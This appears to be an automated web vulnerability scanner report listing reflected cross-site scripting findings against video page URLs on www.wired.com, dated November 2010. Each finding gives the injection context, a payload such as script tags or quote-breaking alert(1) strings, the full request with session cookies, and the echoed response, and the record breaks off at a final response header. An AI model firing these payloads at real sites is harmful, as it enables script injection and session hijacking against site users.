<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang=" ...[SNIP]... <body class="s_video ss_behind-the-scenes-2012 c_69568495001ce64a"><a>8daa3aab393"> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3887d"><a>2f22d43b5dd was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /video3887d"><a>2f22d43b5dd/behind-the-scenes-disney-epic-mickey-video-game/625093660001 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29450 Vary: Accept-Encoding Cache-Control: max-age=289 Expires: Mon, 22 Nov 2010 00:56:25 GMT Date: Mon, 22 Nov 2010 00:51:36 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_video3887d"><a>2f22d43b5dd ss_behind-the-scenes-disney-epic-mickey-video-game c_625093660001"> ...[SNIP]...
The value of REST URL parameter 1 is copied into an HTML comment. The payload eef9d--><script>alert(1)</script>94cd6923bf8 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /videoeef9d--><script>alert(1)</script>94cd6923bf8/behind-the-scenes-disney-epic-mickey-video-game/625093660001 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29483 Vary: Accept-Encoding Cache-Control: max-age=300 Expires: Mon, 22 Nov 2010 00:57:32 GMT Date: Mon, 22 Nov 2010 00:52:32 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <!-- Exception message: URL not found: /videoeef9d--><script>alert(1)</script>94cd6923bf8/behind-the-scenes-disney-epic-mickey-video-game/625093660001 --> ...[SNIP]...
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9b028"-alert(1)-"fe00e1d27f6 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /video/behind-the-scenes-disney-epic-mickey-video-game9b028"-alert(1)-"fe00e1d27f6/625093660001 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 200 OK Server: Apache/2.0.52 (Red Hat) Content-Language: en-US Content-Type: text/html; charset=ISO-8859-1 Cache-Control: max-age=288 Expires: Mon, 22 Nov 2010 00:58:35 GMT Date: Mon, 22 Nov 2010 00:53:47 GMT Connection: close Connection: Transfer-Encoding Content-Length: 106794
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang=" ...[SNIP]... <script type="text/javascript">
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ab0ae"><a>c48df1a3910 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /video/behind-the-scenes-disney-epic-mickey-video-gameab0ae"><a>c48df1a3910/625093660001 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 200 OK Server: Apache/2.0.52 (Red Hat) Content-Language: en-US Content-Type: text/html; charset=ISO-8859-1 Cache-Control: max-age=299 Expires: Mon, 22 Nov 2010 00:57:33 GMT Date: Mon, 22 Nov 2010 00:52:34 GMT Connection: close Connection: Transfer-Encoding Content-Length: 106810
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang=" ...[SNIP]... <body class="s_video ss_behind-the-scenes-disney-epic-mickey-video-gameab0ae"><a>c48df1a3910 c_625093660001"> ...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9cf33"><a>a6ba26af663 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /video/behind-the-scenes-disney-epic-mickey-video-game/6250936600019cf33"><a>a6ba26af663 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 200 OK Server: Apache/2.0.52 (Red Hat) Content-Language: en-US Content-Type: text/html; charset=ISO-8859-1 Cache-Control: max-age=274 Expires: Mon, 22 Nov 2010 00:58:24 GMT Date: Mon, 22 Nov 2010 00:53:50 GMT Connection: close Connection: Transfer-Encoding Content-Length: 106765
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang=" ...[SNIP]... <body class="s_video ss_behind-the-scenes-disney-epic-mickey-video-game c_6250936600019cf33"><a>a6ba26af663"> ...[SNIP]...
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 658e0"-alert(1)-"b69aaac7020 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /video/behind-the-scenes-disney-epic-mickey-video-game/625093660001658e0"-alert(1)-"b69aaac7020 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 200 OK Server: Apache/2.0.52 (Red Hat) Content-Language: en-US Content-Type: text/html; charset=ISO-8859-1 Cache-Control: max-age=300 Expires: Mon, 22 Nov 2010 00:59:48 GMT Date: Mon, 22 Nov 2010 00:54:48 GMT Connection: close Connection: Transfer-Encoding Content-Length: 106733
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang=" ...[SNIP]... <script type="text/javascript">
The value of REST URL parameter 1 is copied into an HTML comment. The payload 7497c--><script>alert(1)</script>b5e658dbc0e was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /video7497c--><script>alert(1)</script>b5e658dbc0e/behind-the-scenes-doctor-who-the-hungry-earth/664817239001 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29479 Vary: Accept-Encoding Cache-Control: max-age=297 Expires: Mon, 22 Nov 2010 00:57:54 GMT Date: Mon, 22 Nov 2010 00:52:57 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <!-- Exception message: URL not found: /video7497c--><script>alert(1)</script>b5e658dbc0e/behind-the-scenes-doctor-who-the-hungry-earth/664817239001 --> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 23bbc"><a>8ef2b5259b3 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /video23bbc"><a>8ef2b5259b3/behind-the-scenes-doctor-who-the-hungry-earth/664817239001 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29446 Vary: Accept-Encoding Cache-Control: max-age=288 Expires: Mon, 22 Nov 2010 00:56:59 GMT Date: Mon, 22 Nov 2010 00:52:11 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_video23bbc"><a>8ef2b5259b3 ss_behind-the-scenes-doctor-who-the-hungry-earth c_664817239001"> ...[SNIP]...
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 84cbf"-alert(1)-"407319541ef was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /video/behind-the-scenes-doctor-who-the-hungry-earth84cbf"-alert(1)-"407319541ef/664817239001 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 200 OK Server: Apache/2.0.52 (Red Hat) Content-Language: en-US Content-Type: text/html; charset=ISO-8859-1 Cache-Control: max-age=300 Expires: Mon, 22 Nov 2010 00:59:09 GMT Date: Mon, 22 Nov 2010 00:54:09 GMT Connection: close Connection: Transfer-Encoding Content-Length: 106729
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang=" ...[SNIP]... <script type="text/javascript">
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 831a3"><a>e6926060861 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /video/behind-the-scenes-doctor-who-the-hungry-earth831a3"><a>e6926060861/664817239001 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 200 OK Server: Apache/2.0.52 (Red Hat) Content-Language: en-US Content-Type: text/html; charset=ISO-8859-1 Cache-Control: max-age=287 Expires: Mon, 22 Nov 2010 00:57:56 GMT Date: Mon, 22 Nov 2010 00:53:09 GMT Connection: close Connection: Transfer-Encoding Content-Length: 106786
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang=" ...[SNIP]... <body class="s_video ss_behind-the-scenes-doctor-who-the-hungry-earth831a3"><a>e6926060861 c_664817239001"> ...[SNIP]...
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 283f1"-alert(1)-"762e65a9c8a was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /video/behind-the-scenes-doctor-who-the-hungry-earth/664817239001283f1"-alert(1)-"762e65a9c8a HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 200 OK Server: Apache/2.0.52 (Red Hat) Content-Language: en-US Content-Type: text/html; charset=ISO-8859-1 Cache-Control: max-age=300 Expires: Mon, 22 Nov 2010 01:00:03 GMT Date: Mon, 22 Nov 2010 00:55:03 GMT Connection: close Connection: Transfer-Encoding Content-Length: 106800
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang=" ...[SNIP]... <script type="text/javascript">
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6b0a3"><a>29a45465649 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /video/behind-the-scenes-doctor-who-the-hungry-earth/6648172390016b0a3"><a>29a45465649 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 200 OK Server: Apache/2.0.52 (Red Hat) Content-Language: en-US Content-Type: text/html; charset=ISO-8859-1 Cache-Control: max-age=300 Expires: Mon, 22 Nov 2010 00:59:12 GMT Date: Mon, 22 Nov 2010 00:54:12 GMT Connection: close Connection: Transfer-Encoding Content-Length: 106761
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang=" ...[SNIP]... <body class="s_video ss_behind-the-scenes-doctor-who-the-hungry-earth c_6648172390016b0a3"><a>29a45465649"> ...[SNIP]...
The value of REST URL parameter 1 is copied into an HTML comment. The payload a69b9--><script>alert(1)</script>9b884715abb was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /videoa69b9--><script>alert(1)</script>9b884715abb/behind-the-scenes-of-harry-potter-and-the-deathly-hallows/650875857001 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29503 Vary: Accept-Encoding Cache-Control: max-age=300 Expires: Mon, 22 Nov 2010 00:57:45 GMT Date: Mon, 22 Nov 2010 00:52:45 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <!-- Exception message: URL not found: /videoa69b9--><script>alert(1)</script>9b884715abb/behind-the-scenes-of-harry-potter-and-the-deathly-hallows/650875857001 --> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2f0b7"><a>e66b21fed8c was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /video2f0b7"><a>e66b21fed8c/behind-the-scenes-of-harry-potter-and-the-deathly-hallows/650875857001 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29470 Vary: Accept-Encoding Cache-Control: max-age=282 Expires: Mon, 22 Nov 2010 00:56:39 GMT Date: Mon, 22 Nov 2010 00:51:57 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_video2f0b7"><a>e66b21fed8c ss_behind-the-scenes-of-harry-potter-and-the-deathly-hallows c_650875857001"> ...[SNIP]...
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2695a"-alert(1)-"4170dfbb3c was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /video/behind-the-scenes-of-harry-potter-and-the-deathly-hallows2695a"-alert(1)-"4170dfbb3c/650875857001 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 200 OK Server: Apache/2.0.52 (Red Hat) Content-Language: en-US Content-Type: text/html; charset=ISO-8859-1 Cache-Control: max-age=300 Expires: Mon, 22 Nov 2010 00:58:47 GMT Date: Mon, 22 Nov 2010 00:53:47 GMT Connection: close Connection: Transfer-Encoding Content-Length: 106812
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang=" ...[SNIP]... <script type="text/javascript">
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ff018"><a>b757ef44c69 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /video/behind-the-scenes-of-harry-potter-and-the-deathly-hallowsff018"><a>b757ef44c69/650875857001 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 200 OK Server: Apache/2.0.52 (Red Hat) Content-Language: en-US Content-Type: text/html; charset=ISO-8859-1 Cache-Control: max-age=300 Expires: Mon, 22 Nov 2010 00:57:48 GMT Date: Mon, 22 Nov 2010 00:52:48 GMT Connection: close Connection: Transfer-Encoding Content-Length: 106785
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang=" ...[SNIP]... <body class="s_video ss_behind-the-scenes-of-harry-potter-and-the-deathly-hallowsff018"><a>b757ef44c69 c_650875857001"> ...[SNIP]...
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload cc05a"-alert(1)-"06ca3db5bf4 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /video/behind-the-scenes-of-harry-potter-and-the-deathly-hallows/650875857001cc05a"-alert(1)-"06ca3db5bf4 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
